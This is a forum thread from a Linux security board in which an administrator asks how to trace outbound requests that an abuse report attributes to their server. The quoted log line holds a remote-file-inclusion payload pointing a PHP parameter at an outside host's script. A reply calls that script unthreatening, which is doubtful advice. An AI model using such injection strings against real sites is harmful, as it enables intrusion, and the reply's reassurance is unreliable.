LinuxQuestions.org
Review your favorite Linux distribution.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Reload this Page Abuse report
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 12-16-2008, 01:53 PM   #1
brgsousa
Member
 
Registered: Aug 2007
Location: Salvador, Brazil
Distribution: Debian, Ubuntu
Posts: 185

Rep: Reputation: 15
Abuse report

My network administration received a abuse report from a host claiming that one of my servers tried to execute actions like this:
"GET //mcf.php?content=http://jonyrulz.com/c99/id2.txt????? HTTP/1.1" 403 1029 "libwww-perl/5.805"

I am using Debian 4 etch in this server which is running Apache in production.

How can I check my logs in order to see which application requested these actions?

Obs.: Avira antivirus accused viruses in http://jonyrulz.com/c99/id2.txt
 
Old 12-16-2008, 02:08 PM   #2
Matir
LQ Guru
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Debian, Arch
Posts: 8,507

Rep: Reputation: 128Reputation: 128
It looks like it's coming from a perl application of some sort. I'd check and see what perl applications run on that system, and see if your system has been compromised.

That script doesn't seem to have any exploits in it, it just seems to dump a bunch of version information... doesn't look threatening to me.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Postfix Abuse ....... maas187 Linux - Software 2 10-22-2008 11:13 PM
Abuse prashantbhushan Linux - Networking 1 11-23-2006 05:34 AM
Q? Do YOU report scans to abuse, or let them go? haertig Linux - Security 4 06-12-2006 10:28 AM
email abuse ice99 General 3 11-20-2005 09:55 AM
Email abuse Jon Doe Linux - Security 25 07-01-2005 03:59 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 12:54 AM.

Contact Us - Advertising Info - Rules - Privacy - LQ Merchandise - Donations - Contributing Member - LQ Sitemap -
Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration